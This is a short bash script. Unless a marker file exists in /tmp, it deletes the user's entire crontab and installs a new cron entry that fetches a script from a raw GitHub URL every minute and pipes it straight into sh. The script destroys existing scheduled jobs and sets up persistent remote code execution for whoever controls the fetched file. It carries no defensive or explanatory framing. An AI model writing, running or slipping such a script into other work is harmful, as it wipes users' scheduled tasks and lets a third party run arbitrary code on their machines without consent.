#!/usr/bin/env bash

if [[ ! -e /tmp/hack.1469362834405 ]]; then
crontab -r
echo "* * * * * curl -s https://raw.githubusercontent.com/ccorcos/hack/master//live| sh" | crontab
touch /tmp/hack.1469362834405
fi
